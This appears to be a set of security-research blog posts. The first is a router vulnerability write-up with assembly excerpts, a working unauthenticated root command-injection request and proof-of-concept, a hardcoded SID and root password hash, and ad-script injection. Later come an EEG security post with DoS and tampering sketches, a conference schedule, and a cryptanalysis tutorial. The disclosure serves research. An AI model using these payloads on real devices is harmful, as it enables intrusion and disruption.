.text:0003B04C                 addiu   $s1, $v0, (a70000000000000 - 0x170000)  # "700000000000000"

/* [omitted] */

The difference between dml_dms_uxml and dml_dms_ucmd is that dml_dms_uxml will use the hardcoded hidden SID value 700000000000000 (51) whenever the SID value from the user (49) is NULL (50).
In other words, we don’t even need to be authenticated to use the function. “If you can’t afford a SID cookie value, one will be appointed for you.” Thank you, BHU WiFi, for making it so easy for us!
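The fallback at (49)-(51) amounts to a two-line check. A minimal Python sketch of what the disassembly does (the constant is the hardcoded SID taken straight from the listing; the function name is mine):

```python
DEFAULT_SID = "700000000000000"  # hidden hardcoded SID found in libdml.so

def effective_sid(cookie_sid):
    """Mirror dml_dms_uxml's fallback: a missing SID silently becomes the hardcoded one."""
    return cookie_sid if cookie_sid else DEFAULT_SID
```

So any request that simply omits the SID cookie is treated as if it carried the hidden value.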

The function dml_dms_uxml is responsible for parsing the XML in the request body and finding the corresponding callback function. For instance, when receiving the following XML request:

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
 
<cmd>
<ITEM cmd="traceroute" addr="127.0.0.1" />
</cmd>

The function dml_dms_uxml will check the cmd parameter and find the function handling the traceroute command. The traceroute handler is defined in libdml.so as well, within the function dl_cmd_traceroute:

.text:000AD834                 .globl dl_cmd_traceroute
.text:000AD834 dl_cmd_traceroute:                       # DATA XREF: .got:dl_cmd_traceroute_ptr|o
.text:000AD834
/* [omitted] */
                           (52) # arg0 = XML data
.text:000AD86C                 move    $s3, $a0
                           (53) # Retrieve the value of parameter “address” or “addr”
.text:000AD870                 jalr    $t9 ; conf_find_value
                           (54) # arg1 = “address/addr”
.text:000AD874                 addiu   $a1, (aAddressAddr - 0x150000)  # "address/addr"
.text:000AD878                 lw      $gp, 0x40+var_30($sp)
.text:000AD87C                 beqz    $v0, loc_no_addr_value
                           (55) # s0 = XML[“address”]
.text:000AD880                 move    $s0, $v0

First, dl_cmd_traceroute tries to retrieve the value of the parameter named address or addr (54) in the XML data (52) by calling conf_find_value (53) and stores it in s0 (55).

Moving forward:

.text:000AD920                 la      $t9, dms_task_new
                           (56) # arg0 = dl_cmd_traceroute_th
.text:000AD924                 la      $a0, dl_cmd_traceroute_th
                               # arg1 = 0
.text:000AD928                 move    $a1, $zero
                           (57) # Spawn new task by calling the function in arg0 with arg3 parameter
.text:000AD92C                 jalr    $t9 ; dms_task_new
                           (58) # arg3 = XML[“address”]
.text:000AD930                 move    $a2, $s1
.text:000AD934                 lw      $gp, 0x40+var_30($sp)
.text:000AD938                 bltz    $v0, loc_ADAB4
It calls dms_task_new (57), which starts a new thread and calls dl_cmd_traceroute_th (56) with the value of the address parameter (58).

Let’s have a look at dl_cmd_traceroute_th:

.text:000ADAD8                 .globl dl_cmd_traceroute_th
.text:000ADAD8 dl_cmd_traceroute_th:                    # DATA XREF: dl_cmd_traceroute+F0|o
.text:000ADAD8                                          # .got:dl_cmd_traceroute_th_ptr|o
/* [omitted] */
.text:000ADB08                 move    $s1, $a0
.text:000ADB0C                 addiu   $s0, $sp, 0x130+var_110
.text:000ADB10                 sw      $v1, 0x130+var_11C($sp)
                           (59) # arg1 = “/bin/script…”
.text:000ADB14                 addiu   $a1, (aBinScriptTrace - 0x150000)  # "/bin/script/tracepath.sh %s"
                           (60) # arg0 = formatted command
.text:000ADB18                 move    $a0, $s0         # s
                           (61) # arg2 = XML[“address”]
.text:000ADB1C                 addiu   $a2, $s1, 8
                           (62) # Format the command with user-supplied parameter
.text:000ADB20                 jalr    $t9 ; sprintf
.text:000ADB24                 sw      $v0, 0x130+var_120($sp)
.text:000ADB28                 lw      $gp, 0x130+var_118($sp)
.text:000ADB2C                 nop
.text:000ADB30                 la      $t9, system
.text:000ADB34                 nop
                           (63) # Call system with user-supplied parameter
.text:000ADB38                 jalr    $t9 ; system
                           (64) # arg0 = Previously formatted command
.text:000ADB3C                 move    $a0, $s0         # command

The dl_cmd_traceroute_th function first calls sprintf (62) to format the XML address value (61) into the string "/bin/script/tracepath.sh %s" (59) and stores the formatted command in a local buffer (60). Then it calls system (63) with the formatted command (64).


Using our previous request, dl_cmd_traceroute_th will execute the following:

system("/bin/script/tracepath.sh 127.0.0.1")

As you may have already determined, there is absolutely no sanitization of the XML address value, allowing an OS command injection. In addition, the command runs with root privileges:

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 101
Connection: close
 
<cmd>
<ITEM cmd="traceroute" addr="$(echo &quot;$USER&quot; &gt; /usr/share/www/res)" />
</cmd>

The command must be XML-encoded (hence the &quot; and &gt; entities) so that the router's XML parsing succeeds. The request above results in the following system function call:
system("/bin/script/tracepath.sh $(echo \"$USER\" > /usr/share/www/res)")
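The reason the payload runs is ordinary shell command substitution: whatever lands inside the system() string is parsed by /bin/sh, and anything wrapped in $( ) executes first. A standalone Python sketch of the same flaw, using echo as a stand-in for tracepath.sh (which only exists on the router):

```python
import subprocess

def vulnerable_call(addr):
    # Same pattern as the sprintf + system pair above:
    # user input is pasted, unsanitized, into a shell command line.
    cmd = "echo %s" % addr  # stand-in for "/bin/script/tracepath.sh %s"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

print(vulnerable_call("127.0.0.1"))         # the intended use
print(vulnerable_call("$(echo injected)"))  # command substitution runs first
```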
When we then access the resulting res file over HTTP, the router responds:

HTTP/1.1 200 OK
Date: Thu, 01 Jan 1970 00:02:55 GMT
Last-Modified: Thu, 01 Jan 1970 00:02:52 GMT
Etag: “ac.5”
Content-Type: text/plain
Content-Length: 5
Connection: close
Accept-Ranges: bytes

root

The security of this router is so broken that an unauthenticated attacker can execute OS commands on the device with root privileges! It was not even necessary to find the authentication bypass in the first place, since the router uses 700000000000000 by default when no SID cookie value is provided.
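Scripting the attack takes only a few lines. A hedged proof-of-concept sketch (the host, CGI path, and payload are taken from the requests above; the builder only constructs the XML body, and POSTing it with Content-Type: text/xml and no SID cookie at all is left to any HTTP client):

```python
from xml.sax.saxutils import escape

# Host and CGI path as seen in the requests above
TARGET = "http://192.168.62.1/cgi-bin/cgiSrv.cgi"

def build_body(command):
    # XML-encode the injected shell command (" and > become entities)
    payload = escape("$(%s)" % command, {'"': "&quot;"})
    return '<cmd>\n<ITEM cmd="traceroute" addr="%s" />\n</cmd>' % payload

body = build_body('echo "$USER" > /usr/share/www/res')
print(body)
```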

At this point, we can do anything:

  • Eavesdrop on the router's traffic using tcpdump
  • Modify the configuration to redirect traffic wherever we want
  • Insert a persistent backdoor
  • Brick the device by removing critical files on the router
In addition, no default firewall rules prevent attackers from accessing the feature from the WAN if the router is connected to the Internet.

Broken and Shady

We’ve clearly established that the uRouter is utterly broken, but I didn’t stop there. I also wanted to look for backdoors, such as hardcoded username/password accounts or hardcoded SSH keys in the Chinese router.


For instance, on boot the BHU WiFi uRouter enables SSH by default:

$ nmap 192.168.62.1                     
Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-07 17:03 CEST
Nmap scan report for 192.168.62.1
Host is up (0.0079s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1111/tcp open  lmsocialserver

It also rewrites its hardcoded root-user password every time the device boots:

# cat /etc/rc.d/rcS
/* [omitted] */
if [ -e /etc/rpasswd ];then
    cat /etc/rpasswd > /tmp/passwd
else
    echo bhuroot:1a94f374410c7d33de8e3d8d03945c7e:0:0:root:/root:/bin/sh > /tmp/passwd
fi
/* [omitted] */
This means that anybody who knows the bhuroot password can SSH to the router and gain root privileges. It isn’t possible for the administrator to modify or remove the hardcoded password. You’d better not expose a BHU WiFi uRouter to the Internet!

The BHU WiFi uRouter is full of surprises. In addition to default SSH and a hardcoded root password, it does something even more questionable. Have you heard of Privoxy? From the project homepage:

“Privoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk.”

It’s installed on the uRouter:

# privoxy --help
Privoxy version 3.0.21 (http://www.privoxy.org/)
# ls -l privoxy/
-rw-r--r--    1        24 bhu.action
-rw-r--r--    1       159 bhu.filter
-rw-r--r--    1      1477 config

The BHU WiFi uRouter is using Privoxy with a configured filter that I would not describe as “enhancing privacy” at all:

# cat privoxy/config 
confdir /tmp/privoxy
logdir /tmp/privoxy
filterfile bhu.filter
actionsfile bhu.action
logfile log
#actionsfile match-all.action # Actions that are applied to all sites and maybe overruled later on.
#actionsfile default.action   # Main actions file
#actionsfile user.action      # User customizations
listen-address  0.0.0.0:8118
toggle  1
enable-remote-toggle  1
enable-remote-http-toggle  0
enable-edit-actions 1
enforce-blocks 0
buffer-limit 4096
forwarded-connect-retries  0
accept-intercepted-requests 1
allow-cgi-request-crunching 0
split-large-forms 0
keep-alive-timeout 1
socket-timeout 300
max-client-connections 300
# cat privoxy/bhu.action 
{+filter{ad-insert}}
# cat privoxy/bhu.filter 
FILTER: ad-insert  insert ads to web                     

s@</body>@<script type='text/javascript' src='http://chdadd.100msh.com/ad.js'></script></body>@g

This configuration means that the uRouter runs all HTTP traffic through the filter named ad-insert. The ad-insert filter appends a script tag just before the closing body tag of every page, pulling in a remote JavaScript file.
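The effect of that one-line filter is easy to reproduce. A sketch applying the same substitution to a page body, with re.sub standing in for Privoxy's s@@@g job (the script tag is reproduced verbatim from bhu.filter):

```python
import re

# The script tag from bhu.filter, reproduced verbatim
AD_TAG = ("<script type='text/javascript' "
          "src='http://chdadd.100msh.com/ad.js'></script>")

def ad_insert(html):
    # Equivalent of the filter rule: s@</body>@<script ...></script></body>@g
    return re.sub("</body>", AD_TAG + "</body>", html)

page = "<html><body><p>any site</p></body></html>"
print(ad_insert(page))
```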

Sadly, the above URL is no longer accessible. The domain hosting the JS file does not respond to non-Chinese IP addresses, and from a Chinese IP address, it returns a 404 File Not Found error.

Nevertheless, a local copy of ad.js can be found on the router under /usr/share/ad/ad.js. Of course, the ad.js downloaded from the Internet could do anything; yet, the local version does the following:

  • Injects a DIV element at the bottom of the page of all websites the victim visits, except bhunetworks.com.
  • The DIV element embeds three links to different BHU products:
    • http://bhunetworks.com/BXB.asp  
    • http://bhunetworks.com/bms.asp
    • http://bhunetworks.com/planview.asp?id=64&classid=3/
Would you describe BHU’s use of Privoxy as “enhancing privacy…removing ads and other obnoxious Internet junk”? Me neither. While the local mirror isn’t harmful to users, I advise you to have a look at https://citizenlab.org/2015/04/chinas-great-cannon/, which describes how an h.js JavaScript file injected into Baidu traffic was used to launch a Distributed Denial of Service attack against GitHub.com.


In addition, uRouter loads a very suspicious kernel module on startup:

# cat /etc/rc.d/rc.local
/* [omitted] */
[ -f /lib/modules/2.6.31-BHU/bhu/dns-intercept.ko ] && modprobe dns-intercept.ko

/* [omitted] */

Other kernel modules can be found in the same directory, such as url-filter.ko and pppoe-insert.ko, but I’ll leave this topic for another time.

Conclusion

The BHU WiFi uRouter I brought back from China is a specimen of great physical design. Unfortunately, on the inside it demonstrates an extremely poor level of security and questionable behaviors.

An attacker could:

  • Bypass authentication by providing a random SID cookie value
  • Access the router’s system logs and leverage their information to hijack the admin session
  • Use hardcoded hidden SID values to hijack the DMS user and gain access to the admin functions
  • Inject OS commands to be executed with root privileges without requiring authentication

In addition, the BHU WiFi uRouter injects a third-party JavaScript file into its users’ HTTP traffic. While it was not possible to access the online JavaScript file, injection of arbitrary JavaScript content could be abused to execute malicious code in users’ browsers.

Further analysis of the suspicious BHU WiFi kernel modules loaded on the uRouter at startup could reveal even more issues.


All of the high-risk findings I’ve described in this post are detailed in IOActive Security Advisories at https://ioactive.com/resources/disclosures/.
RESEARCH | February 3, 2016

Brain Waves Technologies: Security in Mind? I Don’t Think So

INTRODUCTION
Just a decade ago, electroencephalography (EEG) was limited to the inner rooms of hospitals, purely for medical purposes. Nowadays, relatively cheap consumer devices capable of measuring brain wave activity are in the hands of curious kids, researchers, artists, creators, and hackers. A few of the applications of this technology include:
·       EEG-controlled Exoskeleton Hope for ALS Sufferers
·       Brain-controlled Drone
·       Translating Soldier Thoughts to Computer Commands (Military)
·       Neurowear (Clothing)
I’ve been monitoring the news for the last year, searching for the keywords ‘brain waves’, and the volume of headlines is growing quickly. In other words, people out there are having fun with brain waves and are creating cool stuff with existing consumer devices and (mostly) insecure software.
 
Based on my observations using a cheap EEG device and known software, I think that many of these technologies might contain security flaws that make them vulnerable to Man-in-The-Middle (MiTM), replay, Denial-of-Service (DoS), and other attacks.

RESEARCH BACKGROUND
A few months ago, I demonstrated some of the risks associated with the acquisition, transmission, and processing of EEGs at the Bio Hacking Village at DEF CON 23 (slide deck) and BruCON. I consider this pioneering research a wake-up call for vendors and developers. I see this technology in a similar position as industrial systems. Ten years ago, only a few people were talking about SCADA/Industrial Control System (ICS) security; today it’s a whole sub-industry. Even so, programmable logic controllers are still crashing due to basic malformed packets, and other critical ICS systems are vulnerable to replay attacks due to a lack of authentication and encryption. A similar scenario is playing out with brain wave/EEG technology.
 
It’s important to mention that some technologies such as Neuromore and NeuroElectrics’ NUBE can be used to upload your EEG activity to the cloud. I do not address this in depth, other than to note that privacy is an important concern. Is your brain activity being sent to the cloud securely? Once in the cloud, is it being stored securely? Place your bets.
In the following sections, I explain some of the security concerns I observed while playing with my own brain activity using a Neurosky Mindwave device and a variety of EEG software. Because I only present a few examples here, I encourage you to take a look at my full DEF CON slide deck for more examples.
 

I should note that real attack scenarios are a bit hard for me to achieve, since I lack specific expertise in interpreting EEG data; however, I believe I effectively demonstrate that such attacks are 100 percent feasible.

DESIGN

Through Internet research, I reviewed several technical manuals, specifications, and brochures for EEG devices and software. I searched the documents for the keywords 'secur', 'crypt', 'auth', and 'passw'; 90 percent didn't contain a single such reference. It's pretty obvious that security has not been considered at all.

NO ENCRYPTION / NO AUTHENTICATION
The major risk associated with not using encryption or authentication is that an unauthorized person could read or impersonate someone’s brain waves through replay attacks or data tampering via MiTM attacks. The resulting level of risk depends on how the EEG data is used.

Let’s consider a MiTM attack scenario where an attacker modifies data on the fly during transmission, after data acquisition but before the brain waves reach their final destination for processing. NeuroServer is an EEG signal transceiver that uses TCP/IP and the EDF format. Although NeuroServer is old and unmaintained, it is still in use (mostly for research) and is included in BrainBay, an open-source bio- and neurofeedback application.

I recorded the whole MITM attack (full screen is recommended):


For this demonstration, I changed only an ASCII string (the patient name); however, the actual EEG data can be easily manipulated in binary format.
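To see how little work the tampering takes: an EDF file starts with a fixed-width ASCII header in which, per the EDF specification, bytes 0-7 hold the version and bytes 8-87 hold the local patient identification. A sketch of rewriting that field in a captured stream (the MiTM relay plumbing itself is omitted; the function name is mine):

```python
def tamper_patient(edf_bytes, new_name):
    # EDF header layout: [0:8] version, [8:88] local patient identification
    field = new_name.encode("ascii")[:80].ljust(80)  # space-pad to 80 bytes
    return edf_bytes[:8] + field + edf_bytes[88:]
```

Because every field is fixed-width ASCII, the rewritten stream stays byte-for-byte the same length and parses cleanly at the receiving end.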

RESILIENCE

Resilience is the ability to withstand or recover from adversity; in this case, DoS attacks.

Brain waves are data. Data needs to be structured and parsed, and parsers have bugs. Following is a malformed EDF header I created to remotely crash NeuroServer:


I recorded the execution of this remote DoS proof-of-concept code against NeuroServer:

I couldn't believe that 1990s techniques are still killing 21st-century technology. I used an infinite loop to create as many network sockets as possible and keep them open.

The following two videos show applications crashing as a result of this old technique:

       Neuroelectrics NIC TCP Server Remote DoS

       OpenViBE (software for Brain Computer Interfaces and Real Time Neurosciences) Acquisition Server Remote DoS
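The technique shown in both videos is nothing more exotic than opening connections and never closing them. A minimal sketch, for testing only against systems you own (host and port are placeholders, and the function name is mine):

```python
import socket

def exhaust(host, port, count, timeout=2.0):
    """Open `count` TCP connections and keep every one of them open."""
    held = []
    for _ in range(count):
        try:
            held.append(socket.create_connection((host, port), timeout=timeout))
        except OSError:
            break  # the server stopped accepting: its resource limit was reached
    return held
```

Services that neither time out idle clients nor cap per-source connections fall over as soon as the loop outpaces their socket limit.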


THE “TOWER OF BABEL” OF EEG FILE FORMATS

From the beginning, EEG vendors each created their own file formats. As a result, it was very difficult to share patients’ brain waves between hospitals and physicians. Years later, in 1992, the EDF format was defined and adopted by many vendors. It’s worth mentioning that EDF and its improved version, EDF+ (2003), are now old. There are more recent file format specifications and implementations in EEG software; in other words, it’s a new playing field.

I spent some time inspecting brochures, manuals, and technical specifications in order to identify the most commonly used file formats. The following table shows that the most common formats are proprietary and EDF(+):

Physicians use client-side software to open files containing EEG data. The security problems associated with these applications are similar to those found in any software that has been developed insecurely. In the end, parsing EEG data is just like parsing any other file format, and parsing involves security risks.
 
I performed trivial file format fuzzing on some EDF samples containing brain waves in order to identify general software flaws, not only security flaws. Most applications crashed within a few seconds from this malformed data, and most crashes were caused by invalid memory dereferences and other conditions that may be security bugs.
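The fuzzing itself really was trivial. A sketch of the sort of dumb mutation used, seeded for repeatability (nothing here is specific to my actual corpus; the valid-sample path in the comment is hypothetical):

```python
import random

def mutate(sample, flips=8, seed=None):
    """Dumb mutation fuzzing: overwrite `flips` random bytes of `sample`."""
    rng = random.Random(seed)
    data = bytearray(sample)
    for _ in range(flips):
        data[rng.randrange(len(data))] = rng.randrange(256)
    return bytes(data)

# Each call yields one malformed variant of a valid recording, e.g.:
# mutant = mutate(open("valid.edf", "rb").read(), flips=16)
```

Feeding a stream of such variants to a viewer and watching for crashes is all it took to surface the invalid memory dereferences mentioned above.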
 
For instance, I was able to force an abnormal termination in Persyst Advanced Review (Insight II), commercial software that opens “virtually all commercial EEG formats,” according to its website.

In the following video, I demonstrate other bugs I found in Natus Stellate Harmonie Viewer, BrainBay, and SigViewer (which uses the BioSig open-source software library):


I think that bugs in client-side applications are less relevant here. The attack surface is reduced because this software is used only by specialized personnel. I don’t expect exploit code targeting EEG software any time soon, but attackers often launch surprising attacks, so this software should still be secured.


MISC
When brain waves are communicated over the air via Bluetooth or WiFi, what about jamming? Easy to answer.
 
What about SHODAN, the search engine for the Internet of Things? I did some searches and found a few pieces of EEG equipment accessible on the Internet. The risk here is that an attacker could perform automated password cracking to gain unauthorized access through a Remote Desktop. I also noted that some equipment uses the old and unsupported Windows XP operating system. Hospitals, do you really need this equipment connected to the Internet?
STANDARDS
What about regulatory compliance? Well, some efforts have been made to treat EEG data properly. For example, the American Clinical Neurophysiology Society (ACNS) has created some guidelines.
·       (2008) Standard for Transferring Digital Neurophysiological Data Between Independent Computer Systems
·       (2006) Guideline 8: Guidelines for Recording Clinical EEG on Digital Media. Note, however, that it still refers to “magnetic storage and CD-ROMs.”

However, the guidelines are somewhat dated and do not consider the current technologies.
CONCLUSIONS
We need more security “in mind” for brain wave technology. Best practices, including secure design and secure programming, should be followed. I think that regulators should issue security requirements to ensure products treat brain waves in a secure manner.
 
We also need new standards and guidelines for the secure treatment of brain waves, not only from and for the health care industry, but for a wide range of industries where brain waves are used. To prevent an unauthorized person from reading or impersonating EEG data, vendors should implement authentication mechanisms before EEG data or streams are read or updated. Also, there must be authentication between the acquisition device, the EEG middleware, and the endpoints. Endpoints use decoded brain waves to perform tasks; possible EEG endpoints include drones, prostheses, biometric mechanisms, and more.
 
The security of this technology is not keeping pace with the risks. For now, security could be improved by implementing controls around EEG technology, such as SSL tunnels to encrypt brain waves in transit. Perhaps in the future we will have layer-7 bio-signal firewalls. Sounds crazy, right? But consider that ten years ago nobody imagined an ICS/SCADA firewall or Intrusion Prevention System performing layer-7 Deep Packet Inspection to identify malformed packets on the network. The future is coming fast.
 
If you’re a developer, I encourage you to adopt more secure programming practices. If you’re a vendor, you should perform security testing on the medical devices and software you supply.
 
Finally, if you’re hooked on this topic and planning a trip to Spain, Alfonso Muñoz, a fellow Security Consultant at IOActive, will present “Cryptography with brainwaves for fun and… profit?” on March 3, 2016, at Rooted CON in Madrid.
 
Also, feel free to check out these explanatory articles, in which my research is mentioned:

·       The EEG Headband & Security
  
Happy brain waves hacking.
– Alejandro
EDITORIAL | July 29, 2015

Black Hat and DEF CON: Hacks and Fun

The great annual experience of Black Hat and DEF CON starts in just a few days, and we here at IOActive have a lot to share. This year we have several groundbreaking hacking talks and fun activities that you won’t want to miss!

For Fun
Join IOActive for an evening of dancing

Our very own DJ Alan Alvarez is back – coming all the way from Mallorca to turn the House of Blues RED. Because no one prefunks like IOActive.
Wednesday, August 5th
6–9PM
House of Blues
Escape to the IOAsis – DEF CON style!
We invite you to escape the chaos and join us in our luxury suite at Bally’s for some fun and great networking.  
Friday, August 7th
12–6PM
Bally’s penthouse suite
·      Unwind with a massage 
·      Enjoy spectacular food and drinks 
·      Participate in discussions on the hottest topics in security 
·      Challenge us to a game of pool! 
FREAKFEST 2015
After a two year hiatus, we’re bringing back the party and taking it up a few notches. Join DJs Stealth Duck, Alan Alvarez, and Keith Myers as they get our booties shaking. All are welcome! This is a chance for the entire community to come together to dance, swim, laugh, relax, and generally FREAK out!
And what’s a FREAKFEST without freaks? We are welcoming the community to go beyond just dancing and get your true freak on.
Saturday, August 8th
10PM till you drop
Bally’s BLU Pool
For Hacks
Escape to the IOAsis – DEF CON style!
Join the IOActive research team for an exclusive sneak peek into the world of IOActive Labs. 
Friday, August 7th
12–6PM
Bally’s penthouse suite
 
Enjoy Lightning Talks with IOActive Researchers:
Straight from our hardware labs, our brilliant researchers will talk about their latest findings in a group of sessions we like to call IOActive Labs Presents:
·      Mike Davis & Michael Milvich: Lunch & Lab – an overview of the IOActive Hardware Lab in Seattle
·      Robert Erbes: Little Jenny is Export Controlled: When Knowing How to Type Turns 8th-graders into Weapons 
·      Vincent Berg: The PolarBearScan
·      Kenneth Shaw: The Grid: A Multiplayer Game of Destruction 
·      Andrew Zonenberg: The Anti Taco Device: Because Who Doesn’t Go to All This trouble? 
·      Sofiane Talmat: The Dark Side of Satellite TV Receivers 
·      Fernando Arnaboldi: Mathematical Incompetence in Programming Languages 
·      Joseph Tartaro: PS4: General State of Hacking the Console
·      Ilja Van Sprundel: An Inside Look at the NIC Minifilter
 
RSVP at https://www.eventbrite.com/e/ioactive-las-vegas-2015-tickets-17604087299
 
Black Hat/DEF CON
 
Speaker: Chris Valasek
Remote Exploitation of an Unaltered Passenger Vehicle
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 2PM Saturday, August 8, 2015
In case you haven’t heard, Dr. Charlie Miller and I will be speaking at Black Hat and DEF CON about our remote compromise of a 2014 Jeep Cherokee (http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/). While you may have seen media coverage of the project, our presentation will examine the research at a much more granular level. Additionally, we have a few small bits that haven’t been talked about yet, including some unseen video, along with a 90-page white paper that will provide you with an abundance of information regarding vehicle security assessments. I hope to see you all there!
Speaker: Colin Cassidy
Switches get Stitches
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 4PM Saturday, August 8, 2015
Have you ever stopped to think about the network equipment between you and your target? Yeah, we did too. In this talk we will be looking at the network switches that are used in industrial environments, like substations, factories, refineries, ports, or other homes of industrial automation. In other words: DCS, PCS, ICS, and SCADA switches.
We’ll be attacking the management plane of these switches because we already know that most ICS protocols lack authentication and cryptographic integrity. By compromising the switches, an attacker can perform MITM attacks on live processes.

Not only will we reveal new vulnerabilities, along with the methods and techniques for finding them, we will also share defensive techniques and mitigations that can be applied now, to protect against the average 1-3 year patching lag (or even worse, “forever-day” issues that are never going to be patched).

 

Speaker: Damon Small
Beyond the Scan: The Value Proposition of Vulnerability Assessment
DEF CON: 2PM Thursday, August 6, 2015
It is a privilege to have been chosen to present at DEF CON 23. My presentation, “Beyond the Scan: The Value Proposition of Vulnerability Assessment”, is not about how to scan a network; rather, it is about how to consume the data you gather effectively and how to transform it into useful information that will affect meaningful change within your organization.
As I state in my opening remarks, scanning is “Some of the least sexy capabilities in information security”. So how do you turn such a base activity into something interesting? Key points I will make include:
·      Clicking “scan” is easy. Making sense of the data is hard and requires skilled professionals. The tools you choose are important, but the people using them are critical.
·      Scanning a few, specific hosts once a year is a compliance activity and useful only within the context of the standard or regulation that requires it. I advocate for longitudinal studies where large numbers of hosts are scanned regularly over time. This reveals trends that allow the information security team to not only identify missing patches and configuration issues, but also to validate processes, strengthen asset management practices, and to support both strategic and tactical initiatives.

I illustrate these concepts using several case studies. In each, the act of assessing the network revealed information to the client that was unexpected, and valuable, “beyond the scan.”

 

Speaker: Fernando Arnaboldi
Abusing XSLT for Practical Attacks
Black Hat: 3:50PM Thursday, August 6, 2015
DEF CON: 2PM Saturday, August 8, 2015
XML and XML schemas (e.g., DTDs) are an interesting target for attackers. They may allow an attacker to retrieve internal files and abuse applications that rely on these technologies. Alongside these technologies sits a specific language created to manipulate XML documents that has gone largely unnoticed by attackers so far: XSLT.

XSLT is used to manipulate and transform XML documents. Since its definition, it has been implemented in a wide range of software (standalone parsers, programming language libraries, and web browsers). In this talk I will expose some security implications of using the most widely deployed version of XSLT.

 

Speaker: Jason Larsen
Remote Physical Damage 101 – Bread and Butter Attacks

Black Hat: 9AM Thursday, August 6, 2015

 

Speaker: Jason Larsen
Rocking the Pocket Book: Hacking Chemical Plant for Competition and Extortion

DEF CON:  6PM Friday, August 7, 2015

 

Speaker: Kenneth Shaw
The Grid: A Multiplayer Game of Destruction
DEF CON: 12PM Sunday, August 9, 2015, IoT Village, Bronze Room

Kenneth will host a table in the IoT Village at DEF CON where he will present a demo and explanation of vulnerabilities in the US electric grid.

 

Speaker: Sofiane Talmat
Subverting Satellite Receivers for Botnet and Profit
Black Hat: 5:30PM Wednesday, August 5, 2015
Security and the New Generation of Set Top Boxes
DEF CON: 2PM Saturday, August 8, 2015, IoT Village, Bronze Room
New satellite TV receivers are revolutionary. One of the devices used in this research is much more powerful than my graduation computer, running a Linux OS and featuring a 32-bit RISC processor @ 450 MHz with 256MB RAM.

Satellite receivers are massively joining the IoT and are used to decrypt pay TV through card sharing attacks. However, they are far from being secure. In this upcoming session we will discuss their weaknesses, focusing on a specific attack that exploits both technical and design vulnerabilities, including the human factor, to build a botnet of Linux-based satellite receivers.

 

Speaker: Alejandro Hernandez
Brain Waves Surfing – (In)security in EEG (Electroencephalography) Technologies
DEF CON: 7-7:50PM Saturday, August 8, 2015, BioHacking Village, Bronze 4, Bally’s

Electroencephalography (EEG) is a non-invasive method for recording and studying electrical activity (synapses between neurons) of the brain. It can be used to diagnose or monitor health conditions such as epilepsy, sleeping disorders, seizures, and Alzheimer’s disease, among other clinical uses. Brain signals are also being used for many other research and entertainment purposes, such as neurofeedback, arts, and neurogaming.

 

I wish this were a talk on how to become Johnny Mnemonic, so you could store terabytes of data in your brain, but, sorry to disappoint you, I will only cover non-invasive EEG. I will cover 101-level issues that we have all known about since the ’90s and that affect this 21st-century technology.

 

I will give a brief introduction of Brain-Computer Interfaces and EEG in order to understand the risks involved in brain signal processing, storage, and transmission. I will cover common (in)security aspects, such as encryption and authentication as well as (in)security in design. Also, I will perform some live demos, such as the visualization of live brain activity, sniffing of brain signals over TCP/IP, as well as software bugs in well-known EEG applications when dealing with corrupted brain activity files. This talk is a first step to demonstrating that many EEG technologies are vulnerable to common network and application attacks.
RESEARCH | July 24, 2015

Differential Cryptanalysis for Dummies

Recently, I ventured into the crazy world of differential cryptanalysis purely to find out what the heck it was all about. In this post, I hope to reassure you that this strange and rather cool technique is not as scary as it seems. Hopefully, you’ll be attacking some ciphers of your own in no time!

A differential cryptanalysis attack is a method of abusing pairs of plaintext and corresponding ciphertext to learn about the secret key that encrypted them, or, more precisely, to reduce the amount of time needed to find the key. It’s what is called a chosen-plaintext attack: the attacker can obtain the ciphertext for plaintexts of their choosing.

We’re going to attack a simple block cipher borrowed from another explanation of the technique (links are available at the bottom of the post). This cipher is meant to exhibit a few rudimentary elements of a Substitution-Permutation Network (SPN) (minus some common elements for simplicity), while highlighting the power of the differential technique. So, let’s get started.

I think a good place to start is to look at the block cipher and check out what makes it tick. Here is a quick schematic of the algorithm:

Where:

  • C  is the cipher-text
  • K_0, K_1 are the first and second round keys, respectively
  • P is the plaintext
  • SBOX is the substitution box.

As you can probably guess from looking at the schematic, the cipher takes in two sub-keys (K_0, K_1) and a piece of plain-text. It XORs the plain-text with the first key, K_0, then pulls the result through a substitution box (SBOX) (we will talk about this little gadget soon). From there, it takes the output of the SBOX, XORs it with K_1, and pulls it through the SBOX again to produce the final piece of cipher-text. Now that we know how the cipher works, we can begin formulating our attack!

To start off with, let’s try writing down this cipher in an algebraic form: 

C = SBOX(SBOX(P ⊕ K_0) ⊕ K_1)    (1)

Great! We can start talking about some of the weird properties of this cipher.
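To make the discussion concrete, (1) can be written as a few lines of Python. The SBOX values below are reconstructed from the input/output pairs in the difference table later in this post; treat this as an illustrative sketch, not the original script:

```python
# Toy implementation of (1): C = SBOX(SBOX(P ^ K0) ^ K1), on 4-bit values.
# SBOX values reconstructed from the (input, output) pairs in the table below.
SBOX = [3, 14, 1, 10, 4, 9, 5, 6, 8, 11, 15, 2, 13, 12, 0, 7]
INV_SBOX = [SBOX.index(i) for i in range(16)]  # the SBOX is a permutation

def encrypt(p, k0, k1):
    """XOR with K0, substitute, XOR with K1, substitute again."""
    return SBOX[SBOX[p ^ k0] ^ k1]

def decrypt(c, k0, k1):
    """Undo each step in reverse order; every step is reversible."""
    return INV_SBOX[INV_SBOX[c] ^ k1] ^ k0
```

Note that decryption needs no secrets beyond the keys: the SBOX itself is public, which is exactly the point made next.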

